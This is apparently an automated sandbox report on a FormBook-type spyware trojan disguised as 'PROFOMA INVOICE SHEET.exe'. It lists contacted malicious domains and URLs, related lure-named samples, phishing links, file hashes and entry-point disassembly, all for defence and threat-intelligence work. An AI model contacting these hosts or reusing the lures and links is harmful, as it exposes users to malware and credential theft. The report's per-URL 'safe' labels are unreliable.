                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  http://www.wajf.net | bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.ecosia.org/newtab/ | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech | TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q= | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj | TapiUnattend.exe, 00000006.00000002.4151512701.0000000004984000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000039C4000.00000004.00000001.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb | TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  IP | Domain | Country | ASN | ASN Name | Malicious
                                  104.21.31.249 | www.aaavvejibej.bond | United States | 13335 | CLOUDFLARENETUS | false
                                  156.242.132.82 | www.shanhaiguan.net | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
                                  136.143.186.12 | zhs.zohosites.com | United States | 2639 | ZOHO-ASUS | false
                                  199.192.21.169 | www.selftip.top | United States | 22612 | NAMECHEAP-NETUS | false
                                  44.213.25.70 | newdaydawning.net | United States | 14618 | AMAZON-AESUS | false
                                  54.81.206.248 | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
                                  3.33.130.190 | crowsecurity.cloud | United States | 8987 | AMAZONEXPANSIONGB | false
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1511723
                                  Start date and time:2024-09-16 09:28:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:2
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:PROFOMA INVOICE SHEET.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@14/7
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:
                                  • Successful, ratio: 90%
                                  • Number of executed functions: 44
                                  • Number of non-executed functions: 300
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes were analyzed; report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  Time | Type | Description
                                  03:30:19 | API Interceptor | 9381238x Sleep call for process: TapiUnattend.exe modified
                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                  136.143.186.12 | x.exe | Get hash | malicious | FormBook | Browse
                                  • www.lanxuanz.tech/em49/
                                  136.143.186.12 | bin.exe | Get hash | malicious | FormBook | Browse
                                  • www.lanxuanz.tech/em49/
                                  136.143.186.12 | PR44238-43433.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/nq8t/
                                  136.143.186.12 | w3xlXm0r8W.exe | Get hash | malicious | FormBook | Browse
                                  • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                  136.143.186.12 | RFQ-9877678-9988876509886546887.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/nq8t/
                                  136.143.186.12 | RFQ-9877678-9988876509886546884.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/nq8t/
                                  136.143.186.12 | H25iQbxCki.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/mcz6/
                                  136.143.186.12 | RFQ 5654077845567895504_d0c.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/nq8t/
                                  136.143.186.12 | VSL_BUNKER INQUIRY.exe | Get hash | malicious | FormBook | Browse
                                  • www.topscaleservices.com/uyud/?4PB=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af96nyleFJwK0nJryK+5dgXb3T0bI8KcvkRm3LjrqBQ==&wdZh=n2Ih08C05RZDa
                                  136.143.186.12 | SCAN_0033245554672760018765524126524_pdf.exe | Get hash | malicious | FormBook | Browse
                                  • www.jrksa.info/nq8t/
                                  199.192.21.169 | SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | Get hash | malicious | FormBook | Browse
                                  • www.zenscape.top/d8cw/
                                  199.192.21.169 | file.exe | Get hash | malicious | FormBook | Browse
                                  • www.urbanpulse.help/r50h/
                                  199.192.21.169 | INV & BANK DETAILS LETTER.pdf.exe | Get hash | malicious | FormBook | Browse
                                  • www.cenfresh.life/6iok/
                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                  webredir.vip.gandi.net | FATURALAR PDF.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | Order#Qxz091124.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | PO #86637.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | au1FjlRwFR.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | COTIZACION 290824.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  webredir.vip.gandi.net | DHL AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse
                                  • 217.70.184.50
                                  zhs.zohosites.com | x.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | bin.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | PR44238-43433.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | w3xlXm0r8W.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | RFQ-9877678-9988876509886546887.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | RFQ-9877678-9988876509886546884.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | VSL_BUNKER INQUIRY.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.180.12
                                  zhs.zohosites.com | eNXDCIvEXI.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.180.12
                                  zhs.zohosites.com | H25iQbxCki.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  zhs.zohosites.com | RFQ 5654077845567895504_d0c.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | Get hash | malicious | FormBook | Browse
                                  • 45.114.171.236
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | RFQ-TECMARKQATAR PO33109.xlsx | Get hash | malicious | FormBook | Browse
                                  • 45.114.171.236
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Get hash | malicious | FormBook | Browse
                                  • 154.213.157.32
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | SecuriteInfo.com.Linux.Siggen.9999.5151.15671.elf | Get hash | malicious | Mirai | Browse
                                  • 160.124.177.51
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | Jsn496Em5T.exe | Get hash | malicious | FormBook | Browse
                                  • 154.216.48.123
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | firmware.armv5l.elf | Get hash | malicious | Unknown | Browse
                                  • 156.250.222.244
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | firmware.armv7l.elf | Get hash | malicious | Unknown | Browse
                                  • 154.216.66.110
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | firmware.mipsel.elf | Get hash | malicious | Unknown | Browse
                                  • 154.202.175.222
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | ORDER_pdf.exe | Get hash | malicious | FormBook | Browse
                                  • 154.92.59.24
                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | 8htbxM8GPX.exe | Get hash | malicious | FormBook | Browse
                                  • 154.215.72.110
                                  CLOUDFLARENETUS | September PO.exe | Get hash | malicious | AgentTesla | Browse
                                  • 104.26.12.205
                                  CLOUDFLARENETUS | TT USD 170,196 - 16.9.2024.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
                                  • 188.114.96.3
                                  CLOUDFLARENETUS | Benefit Upadate For Guillaume.a.docx | Get hash | malicious | HTMLPhisher | Browse
                                  • 104.17.25.14
                                  CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse
                                  • 172.67.74.152
                                  CLOUDFLARENETUS | Benefit Upadate For Guillaume.a.docx | Get hash | malicious | HTMLPhisher | Browse
                                  • 188.114.96.3
                                  CLOUDFLARENETUS | SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exe | Get hash | malicious | Unknown | Browse
                                  • 162.159.137.232
                                  CLOUDFLARENETUS | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | Get hash | malicious | AsyncRAT, XWorm | Browse
                                  • 104.18.111.161
                                  CLOUDFLARENETUS | SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exe | Get hash | malicious | Unknown | Browse
                                  • 162.159.137.232
                                  CLOUDFLARENETUS | DONGHONG 8 - FDA.pdf.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
                                  • 188.114.96.3
                                  CLOUDFLARENETUS | Petronas request for-quotation.exe | Get hash | malicious | FormBook | Browse
                                  • 104.21.64.108
                                  ZOHO-ASUS | x.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  ZOHO-ASUS | bin.exe | Get hash | malicious | FormBook | Browse
                                  • 136.143.186.12
                                  ZOHO-ASUS | https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documents | Get hash | malicious | Unknown | Browse
                                  • 136.143.191.172
                                  ZOHO-ASUS | x86.elf | Get hash | malicious | Unknown | Browse
                                  • 165.173.254.246
                                  ZOHO-ASUS | https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKx | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
                                  • 204.141.42.213
                                  ZOHO-ASUS | https://insights.zohorecruit.com/ck1/2d6f.390d3f0/fab65c60-5e29-11ef-896b-525400d6cd4f/02e60029eb3c4e09f8e3cb9644fa23262f52aa86/2?e=arqOrxEM1Pu0aMl2J4DeUujZWH3TPRnuK%2F%2F50IkkynofyG9S9LzMCQGQeD3A8%2BvCqigeqgLnvt4AorXAOg1unw%3D%3D | Get hash | malicious | Unknown | Browse
                                  • 204.141.42.213
                                  ZOHO-ASUS | http://workdrive.zohoexternal.com | Get hash | malicious | Unknown | Browse
                                  • 204.141.43.16
                                  ZOHO-ASUS | https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9b | Get hash | malicious | Unknown | Browse
                                  • 204.141.43.16
                                  ZOHO-ASUS | https://diverescueintl.com/ | Get hash | malicious | HTMLPhisher | Browse
                                  • 204.141.43.67
                                  ZOHO-ASUS | https://mail.osd.is/ahoy/v1/messages/tmUud75kaX5i84jrSddi7RvRoEwnRvGI/click?signature=365a74d8cf6aaa475deb70de401d91b3730068bd&url=https%3A%2F%2Fclicks.behanbros.com%2Fck1%2F2d6f.1666ed262aa69c30%2F85235e80-5a3c-11ef-aa46-525400e18d05%2F1aecbc6e17a7f32f257de147fdcb114dbde4bd0f%2F2%3Fe%3DFl%252F%252FoUXSWwF4eWEmDhD8bO767DIweN%252FgbynhnWQQmfCORP5QUcVtfSPOtr6%252BDxnpoDuQRdtqwnyF1KluaSYTaR5UeBEE6yffkypjSqmL7J5ipExtaLftHqKh%252Bzv8vTL5qyxfKjbZr99sma1YKqi%252BfzRl17ovpu6A5oDfKTScZKLDd12RZf6UCFYMHyoZPddgcbE6zuIJMb5qTeXnQnSyL77bJHrzBkIFTbFomV22oj2Sxfjmusf37%252FtRQJIonhWvmQ2eYZUHNrDGIKboriJd18Zdx8rSd83CHzT8YvPCIJeLAvnSG0%252Bbpl1MNIIFumjajHiG90XC2irPRPcW5GaTA%252BITIsF2wBg8CIBvVGEGwXo4JP3%252B8Onp5k1RR6k7BKW%252BqGlHBTGPuAxqoP%252Ff0cZzsNc21UGjnmx7wKErLb4FefcMhXTbRK3q8zETD9j%252FiR%252FLnM6uZibPZVB9o6ivg7AJj8bKpFnLyO4DwVX0BNeCbVAJFxoU%252BZ%252FZ39PxrsnfftlrJkRaLDKMH%252BxTiRDaunilyq4JKe0%252BcbtfKZUAa27j2VFwYwqEjlzGnrX5%252Fdou7iokpKv8aEs8pQ%252BQIV2dR4YqT%252B5vCkp3w6nguoVaO3EoNbbCRozXu1Ic0kXeinEPwDg3l1%252BY%252FBli4EK0EedpP4%252BP0v3jxxncnqIhYIj45CpXHI88Qx5mocDHAgYzq2CBlrn%252FcsWWOshJql5b6xAr8pq6FNrXoiOolx1VvwyFY8HnDgG9gKxZtCrQP3IS4iN412x0hygoxuA99srteXs7BDcl5V6J3whqQPl%252BznVvdxEPQFxDwIxzw9RUXXdGay00DF%252FLAKov2ZuUmlBbZsW94VCaHg%253D%253D | Get hash | malicious | HTMLPhisher | Browse
                                  • 204.141.42.213
                                  NAMECHEAP-NETUS | Petronas request for-quotation.exe | Get hash | malicious | FormBook | Browse
                                  • 162.0.236.169
                                  NAMECHEAP-NETUS | file.exe | Get hash | malicious | Clipboard Hijacker, Raccoon Stealer v2 | Browse
                                  • 198.54.120.231
                                  NAMECHEAP-NETUS | file.exe | Get hash | malicious | Clipboard Hijacker, Raccoon Stealer v2 | Browse
                                  • 198.54.120.231
                                  NAMECHEAP-NETUS | k8FSEGGo4d9blGr.exe | Get hash | malicious | FormBook | Browse
                                  • 63.250.47.40
                                  NAMECHEAP-NETUS | https://urlz.fr/s6ZW | Get hash | malicious | Unknown | Browse
                                  • 63.250.43.136
                                  NAMECHEAP-NETUS | SHIPPING DOC MBL+HBL.exe | Get hash | malicious | FormBook | Browse
                                  • 162.0.239.141
                                  NAMECHEAP-NETUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg== | Get hash | malicious | EvilProxy, HTMLPhisher | Browse
                                  • 162.0.228.73
                                  NAMECHEAP-NETUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg== | Get hash | malicious | EvilProxy, HTMLPhisher | Browse
                                  • 162.0.228.73
                                  NAMECHEAP-NETUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Br%C2%ADo%C2%ADt%C2%ADv%C2%AD2%C2%AD4.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FKtdCRbWJN443KOWzPtjJuhJU/YW15Lmp | Get hash | malicious | HTMLPhisher | Browse
                                  • 192.64.117.211
                                  NAMECHEAP-NETUS | SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | Get hash | malicious | FormBook | Browse
                                  • 199.192.21.169
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\TapiUnattend.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):0.9746603542602881
                                  Encrypted:false
                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288768
                                  Entropy (8bit):7.992693975408507
                                  Encrypted:true
                                  SSDEEP:6144:8R9jr+Z/n4Iq0N6cTs0FpRR+k+W+h//2dkSvwOvUV6:s9fE/4Iq0cozR+g+/ivS6
                                  MD5:A5CEAA771B77E07D5C822F3441E59382
                                  SHA1:27D92211AAC4C6E8C7AA1DB1DAC9221EF7BFF061
                                  SHA-256:422A51996F3C1D9A4E1227FA1F09B1E1B3C55485D49EF63424568795D6835FC0
                                  SHA-512:94D35B1FA6585E96B339B32276F83C254EB7F9C0987ADC9281988FFE4C3557405184498D355BEB4F7687878A964F0C25A77F6451A22322E84D1817FE0ADA4131
                                  Malicious:false
                                  Reputation:low
                                  Preview:.o|d.8EHV...0....t.IR...x;M...Q596P8EHVIQ596P8EHVIQ596P8EHVI.596^'.FV.X...Qt.i.!8F.F"W":7$qVXX>W1h4,qGLXpQ+h....TY4]kE[Cu596P8EH/HX..V7.x(1.lU^.J..l)6.#...y(1.K...lX".. 2].V7.EHVIQ596.}EH.HP5..0fEHVIQ596.8GI]HZ59`T8EHVIQ5960,EHVYQ59FT8EH.IQ%96P:EHPIQ596P8CHVIQ596PHAHVKQ596P8GH..Q5)6P(EHVIA59&P8EHVIA596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ5.B5@1HVI.a=6P(EHV.U59&P8EHVIQ596P8EHvIQU96P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVIQ596P8EHVI
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.474609294729958
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:PROFOMA INVOICE SHEET.exe
                                  File size:1'722'368 bytes
                                  MD5:bc8d560138e7ac511f70880fc394ad2d
                                  SHA1:ab4eba09f7c4ba9e4dda6d9001f310347540d665
                                  SHA256:50298005475ae317206625562212774d14ecad26a7fd979251618b53f5c65d22
                                  SHA512:1d3b9c9e4c775cef4c4b67f236c494d1b1c64f545deb7c30f6bee213a1d458c913a8c80cb6748feb19b16d4d9cc7c2a0e6d2787dd21f3a2582a0b40a57290810
                                  SSDEEP:24576:FqDEvCTbMWu7rQYlBQcBiT6rprG8aX6gG4eE1Cxitdma80INtB8AauseQsM:FTvC/MTQYxsWR7aXnUeCxQ2zBmuvb
                                  TLSH:9D85E1027391C022FFABA2734F5AF6514BBC69260123E61F13A81DB9BD705B1563E763
                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x420577
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66E76C11 [Sun Sep 15 23:21:53 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                  Instruction
                                  call 00007F6BD4F46C83h
                                  jmp 00007F6BD4F4658Fh
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F6BD4F4676Dh
                                  mov dword ptr [esi], 0049FDF0h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FDF8h
                                  mov dword ptr [ecx], 0049FDF0h
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F6BD4F4673Ah
                                  mov dword ptr [esi], 0049FE0Ch
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FE14h
                                  mov dword ptr [ecx], 0049FE0Ch
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  and dword ptr [eax], 00000000h
                                  and dword ptr [eax+04h], 00000000h
                                  push eax
                                  mov eax, dword ptr [ebp+08h]
                                  add eax, 04h
                                  push eax
                                  call 00007F6BD4F4932Dh
                                  pop ecx
                                  pop ecx
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 0049FDD0h
                                  push eax
                                  call 00007F6BD4F49378h
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  push eax
                                  call 00007F6BD4F49361h
                                  test byte ptr [ebp+08h], 00000001h
                                  pop ecx
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xcdc80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a2000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
